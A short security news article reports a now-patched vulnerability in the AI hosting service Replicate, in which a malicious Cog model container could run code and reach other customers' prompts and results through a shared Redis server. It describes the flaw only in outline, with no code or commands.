Cybersecurity experts have uncovered a significant security vulnerability in Replicate, an AI-as-a-service provider, that exposed customers’ proprietary AI models and sensitive data. This flaw allowed unauthorized access to AI prompts and results, jeopardizing the integrity and confidentiality of the data handled by Replicate. The vulnerability originated from the way AI models are packaged, permitting arbitrary code execution. This could be exploited by threat actors to perform cross-tenant attacks through malicious models.
Replicate utilizes an open-source tool called Cog to containerize and package machine learning models, which can then be deployed in various environments. Researchers from the cloud security firm Wiz demonstrated how a rogue Cog container could be uploaded to Replicate, leading to remote code execution on the service’s infrastructure with elevated privileges. By leveraging an existing TCP connection with a Redis server instance in a Kubernetes cluster on Google Cloud Platform, the researchers were able to inject arbitrary commands. This manipulation of the Redis server, which manages multiple customer requests and responses, could facilitate cross-tenant attacks and compromise the results of other customers’ models.
These attacks pose a severe risk to the accuracy and reliability of AI-driven outputs, potentially exposing proprietary knowledge or sensitive data involved in model training. Additionally, intercepting AI prompts could reveal personally identifiable information (PII). The flaw was responsibly disclosed in January 2024 and has been patched by Replicate. There is no evidence to suggest that this vulnerability was exploited in the wild. This incident highlights the ongoing risks associated with malicious AI models and the importance of robust security measures in AI-as-a-service platforms.
Reference: